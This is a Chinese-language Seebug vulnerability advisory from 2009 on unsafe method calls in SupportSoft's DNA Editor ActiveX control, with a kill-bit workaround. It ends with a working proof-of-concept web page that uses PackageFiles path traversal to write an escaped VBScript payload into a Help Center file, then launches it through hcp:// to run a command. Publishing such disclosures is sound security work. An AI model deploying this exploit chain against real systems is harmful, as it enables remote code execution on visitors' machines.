SupportSoft DNA Editor Module ActiveX控件不安全函数调用漏洞

2009-03-06T00:00:00
ID SSV:4881
Type seebug
Reporter Root
Modified 2009-03-06T00:00:00

Description

BUGTRAQ ID: 34004

SupportSoft是美国的一家实时服务管理软件供货商。

SupportSoft产品中所提供的DNA Editor Module ActiveX控件(dnaedit.dll,CLSID: {01110800-3E00-11D2-8470-0060089874ED})没有正确地过滤对Packagefiles()、SaveDna()、AddFile()、SetIdentity()等方式所传送的参数,如果用户受骗访问了恶意网页并向上述方式传送了特制参数的话,就可能导致拒绝服务、向用户系统下载恶意文件或执行任意代码。

SupportSoft DNA Editor Module v6.9.2205 临时解决方法:

  • 为CLSID: {01110800-3E00-11D2-8470-0060089874ED}设置kill-bit。

厂商补丁:

SupportSoft

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href=http://www.supportsoft.com/ target=_blank rel=external nofollow>http://www.supportsoft.com/</a>

                                        
                                            
                                                &lt;HTML&gt;
&lt;OBJECT classid='clsid:01110800-3E00-11D2-8470-0060089874ED' width=1 height=1 id='DNAEditorCtl' /&gt;
&lt;/OBJECT&gt;
&lt;SCRIPT language='VBScript'&gt;
&lt;!--
sh=&quot;&lt;HTML&gt;&lt;SCRIPT LANGUAGE=VBScript&gt;&quot; + unescape(&quot;Execute%28unescape%28%22Set%20s%3DCreateObject%28%22%22WScript.Shell%22%22%29%250D%250As.Run%20%22%22cmd%20%252fc%20start%20calc%22%22%22%29%29&quot;) + &quot;&lt;&quot; + Chr(47) + &quot;SCRIPT&gt;&lt;&quot; + Chr(47) + &quot;HTML&gt;&quot;
'file path is injected in msinfo.htm, you can see the code by an hex editor, some limit with *number* of chars, some problem with newlines, resolved with vbscript code evaluation by Execute(), a popup says Unable to post... click Ok or close it and you are pwned
DNAEditorCtl.PackageFiles sh + &quot;../../../../../../../../../WINDOWS/PCHEALTH/HELPCTR/System/sysinfo/msinfo.htm&quot;
'launch the script and calc.exe trough the Help and Support Center Service
document.write(&quot;&lt;iframe src=&quot;&quot;hcp://system/sysinfo/msinfo.htm&quot;&quot;&gt;&quot;)
--&gt;
&lt;/SCRIPT&gt;